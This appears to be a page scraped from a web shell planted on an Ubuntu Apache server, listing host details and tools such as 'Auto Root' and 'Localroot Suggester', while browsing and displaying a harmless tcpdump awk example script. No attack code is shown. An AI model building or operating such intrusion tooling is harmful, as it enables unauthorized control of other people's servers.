Linux jobworks 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:53:05 UTC 2026 x86_64
Apache/2.4.58 (Ubuntu)
Server IP : 10.0.1.5 & Your IP : 216.73.217.52
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
doc /
tcpdump /
examples /
Delete
Unzip
Name
Size
Permission
Date
Action
atime.awk
528
B
-rw-r--r--
2023-04-07 18:30
packetdat.awk
1.39
KB
-rw-r--r--
2023-04-07 18:30
send-ack.awk
1.56
KB
-rw-r--r--
2023-04-07 18:30
stime.awk
566
B
-rw-r--r--
2023-04-07 18:30
Save
Rename
$6 !~ /^ack/ && $5 !~ /[SFR]/ { # given a tcpdump ftp trace, output one line for each send # in the form # <send time> <seq no> # where <send time> is the time packet was sent (in seconds with # zero at time of first packet) and <seq no> is the tcp sequence # number of the packet divided by 1024 (i.e., Kbytes sent). # # convert time to seconds n = split ($1,t,":") tim = t[1]*3600 + t[2]*60 + t[3] if (! tzero) { tzero = tim OFS = "\t" } # get packet sequence number i = index($6,":") printf "%7.2f\t%g\n", tim-tzero, substr($6,1,i-1)/1024 }